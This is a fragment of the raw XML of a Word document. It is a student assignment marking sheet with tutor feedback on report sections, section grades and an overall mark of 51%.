        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="589F0237" w14:textId="4962166A" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="31" w:name="feedbackANA"/>
            <w:bookmarkEnd w:id="31"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Your analysis require more in-depth discussions of your research and finding. Cost solution and timetable plan satisfactorily done.  Most areas could do </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>with improvement</w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> and link analysis to your findings.  The introduction could end with the most specific information: a guide to the scope and structure of your report (What coming next in each section). Conclusion summary of key areas of the report done but   stating what improvement for the future could be done.   (Grade mark: 54.29%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6724EA18" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="32" w:name="totalANA"/>
            <w:bookmarkEnd w:id="32"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang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0E358D10" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="33" w:name="markANA"/>
            <w:bookmarkEnd w:id="33"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="494357CC" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="127CE667" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C9FACB2" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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4B11A1A" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="75535EDD" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="378C0CCB" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Practical Application and Deployment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D39FDD" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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BA8AC23" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri"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0E0A629" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="3853E993" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A6B3AC0" w14:textId="2BCA8D76" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="34" w:name="feedbackPAD"/>
            <w:bookmarkEnd w:id="34"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Results of the actual test was provided in appendix but require detailed discussions as mention above.  Nature of how it was done, application used and protocol involved was highlighted.  (Grade mark: 51.43%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1EB991F9" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="35" w:name="totalPAD"/>
            <w:bookmarkEnd w:id="35"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang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5021B61A" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="36" w:name="markPAD"/>
            <w:bookmarkEnd w:id="36"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="3F7E4ED0" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="063475FC" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="259F0643" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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0BFF747" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="1B6D212E" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="6BA24A3E" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">5. </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Skills for Professional Practice</w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C070DB4" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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5A5A2DC" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri"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E659E0C" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="0F5BA8DC" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="449EAE10" w14:textId="5302C19D" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="37" w:name="feedbackSPP"/>
            <w:bookmarkEnd w:id="37"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Can communicate effectively in a suitable format with room for improvement.  The report require formatting especially justify alignment.   Based on your ability, a very </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>disappointed</w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> report. (Grade mark: 55.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1688792D" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="38" w:name="totalSPP"/>
            <w:bookmarkEnd w:id="38"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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0C9D7344" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="39" w:name="markSPP"/>
            <w:bookmarkEnd w:id="39"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="0B507CD1" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A69B964" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54FA1761" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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95FCD37" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29D11C7E" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
      <w:pPr>
        <w:ind w:left="284" w:right="533"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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976736" w:rsidRPr="00976736" w14:paraId="3F607766" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="563EDAF3" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Assignment Mark </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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4627990" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Late Submission Penalties (tick if appropriate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10DE68A0" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="40" w:name="totalMark"/>
            <w:bookmarkEnd w:id="40"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>51%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="208E9C39" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="72D16383" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="65E38229" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
